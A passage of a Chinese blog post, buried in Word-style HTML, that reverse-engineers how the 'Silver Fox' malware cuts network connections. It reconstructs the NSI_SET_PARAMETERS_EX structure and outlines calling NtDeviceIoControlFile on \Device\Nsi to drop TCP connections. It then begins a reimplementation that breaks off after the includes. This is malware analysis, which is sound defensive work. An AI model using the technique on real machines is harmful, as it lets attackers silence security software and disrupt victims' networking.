11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID reserved1</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">     </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x08</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID pModuleId</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">     </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x10 - 指向 TCP 模块 ID（GUID结构或BYTE数组）</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD dwIoCode</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">      </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x18 - 固定 16</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD dwUnused1</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">     </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x1C</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD a1</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x20</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD a2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">            </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x24</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID pInputBuffer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x28</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD cbInputBuffer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x30</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD dwUnused2</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">     </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x34</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">PVOID pMetricBuffer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x38</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD cbMetricBuffer</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x40</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">DWORD dwUnused3</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">;</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">     </span></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;CommentTok&#39;;color: #60A0B0;font-style: italic;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">// 0x44</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;OperatorTok&#39;;color: #666666;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">};</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">我们计划的流程是：</span></span></span></p><p style="mso-style-name: &#39;Source Code&#39;;margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;word-break: break-all;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Aptos;mso-ascii-font-family: Consolas;font-variant: normal;text-transform: none;"><span leaf="">构造 NSI_SET_PARAMETERS_EX →</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">  </span></span><span leaf="">调用 NtDeviceIoControlFile →</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">    </span></span><span leaf="">操作 \Device\Nsi →</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;NormalTok&#39;;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span style="mso-spacerun:yes;"><span leaf="">      </span></span><span leaf="">执行协议堆栈层断网</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">隐约间我们可以明白：</span></span></span></p><p style="mso-list:l1 level1 lfo1;margin-left:36.0pt;text-indent:-18.0pt;"><span style="font-family:Symbol;mso-ascii-font-family:Symbol;mso-fareast-font-family:Aptos;mso-bidi-font-family:Symbol;font-variant:normal;text-transform:none;"><span leaf="">·</span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">Windows 网络栈的 底层通信机制是开放的（设备接口、协议模块）</span></span></span></p><p style="mso-list:l1 level1 lfo1;margin-left:36.0pt;text-indent:-18.0pt;"><span style="font-family:Symbol;mso-ascii-font-family:Symbol;mso-fareast-font-family:Aptos;mso-bidi-font-family:Symbol;font-variant:normal;text-transform:none;"><span leaf="">·</span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">只要掌握结构和调用方式，就能控制网络连接的生死</span></span></span></p><p style=""><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf="">很好这里省略我的悲伤过程，直接上结果：</span></span></span></p><p style="mso-style-name: &#39;Source Code&#39;;margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;mso-pagination: widow-orphan;word-break: break-all;font-size: 12.0pt;font-family: Aptos;mso-fareast-font-family: &#39;Aptos&#39;;mso-fareast-language: EN-US;font-weight: normal;mso-bidi-font-weight: normal;"><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;ImportTok&#39;;color: #008000;font-weight: bold;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><windows.h></windows.h></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#include </span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#pragma comment(lib, &#34;iphlpapi.lib&#34;)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#pragma comment(lib, &#34;ws2_32.lib&#34;)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="mso-ansi-font-size: 11.0pt;mso-style-parent: &#39;Verbatim Char&#39;;mso-style-name: &#39;PreprocessorTok&#39;;color: #BC7A00;font-family: Consolas;mso-ascii-font-family: Consolas;mso-fareast-font-family: Aptos;font-variant: normal;text-transform: none;"><span leaf="">#pragma comment(lib, &#34;Psapi.lib&#34;)</span></span></span><span style="mso-bookmark:浅浅分析银狐最新断网手法;"><span style="font-family:Aptos;mso-ascii-font-family:Aptos;mso-fareast-font-family:Aptos;font-variant:normal;text-transform:none;"><span leaf=""><br/></span><span leaf=""><br/></span></span></span><span 